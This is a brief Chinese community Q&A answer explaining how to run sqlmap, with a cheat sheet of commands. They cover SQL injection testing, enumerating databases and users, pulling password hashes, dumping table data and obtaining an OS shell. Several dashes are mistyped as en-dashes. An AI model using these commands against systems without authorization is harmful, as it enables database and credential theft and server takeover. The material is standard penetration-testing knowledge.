python sqlmap 怎么用
python sqlmap 怎么用
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
-
123
解压sqlmap到硬盘
比如D:/sqlmap,打开CMD,输入python D:sqlmapsqlmap.py 就可以用了。
列几个基本命令
./sqlmap.py –h //查看帮助信息
./sqlmap.py –u “域名” //get注入
./sqlmap.py –u “域名” --data “DATA”//post注入
./sqlmap.py –u “域名” --cookie “COOKIE”//修改请求时的cookie
./sqlmap.py –u “域名” --dbs //列数据库
./sqlmap.py –u “域名” –-users //列用户
./sqlmap.py –u “域名” –-passwords //获取密码hash
./sqlmap.py –u “域名” –-tables -D DB_NAME //列DB_NAME的表
./sqlmap.py –u “域名” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列
./sqlmap.py –u “域名” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据
./sqlmap.py –u “域名” –-os-shell //取得一个shell
2019-07-17 22:24:24赞同 展开评论